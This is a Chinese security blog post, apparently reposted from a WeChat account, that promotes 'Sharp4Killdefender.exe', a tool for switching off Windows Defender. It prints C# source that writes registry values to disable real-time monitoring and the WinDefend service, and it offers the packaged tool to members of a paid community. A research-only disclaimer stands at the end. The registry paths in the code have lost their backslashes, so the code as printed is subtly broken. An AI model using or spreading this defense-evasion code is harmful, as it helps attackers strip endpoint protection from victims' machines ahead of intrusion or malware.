Sharp4Killdefender.exe 是一款关闭 Windows Defender 的工具,通过修改特定的注册表键值实现功能。无需额外的复杂参数,运行后便能自动完成目标操作。
工具要求以管理员权限运行,以便对系统的关键注册表进行修改,修改注册表后,Windows Defender 的核心服务和功能即刻停用,无需重启或手动干预。
Sharp4Killdefender.exe
执行成功后,Windows Defender 将被停用,用户可自行验证,如下图所示。
Sharp4Killdefender.exe 的核心工作原理是通过修改以下注册表项实现的,以下是工具核心功能的部分代码,展示了其实现原理。
using Microsoft.Win32;
public class Sharp4KillDefender
{
public static void DisableDefender()
{
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWAREMicrosoftWindows DefenderReal-Time Protection", true))
{
key.SetValue("DisableRealtimeMonitoring", 1, RegistryValueKind.DWord);
}
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SYSTEMCurrentControlSetServicesWinDefend", true))
{
key.SetValue("Start", 4, RegistryValueKind.DWord);
}
Console.WriteLine("Windows Defender 已成功关闭。");
}
public static void Main(string[] args)
{
DisableDefender();
}
}
通过调整路径的配置,阻止 Defender 核心服务运行,工具已经打包在星球,感兴趣的朋友可以加入自取。
原文始发于微信公众号(哈拉少安全小队):一键关闭 Windows Defender 的利器
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论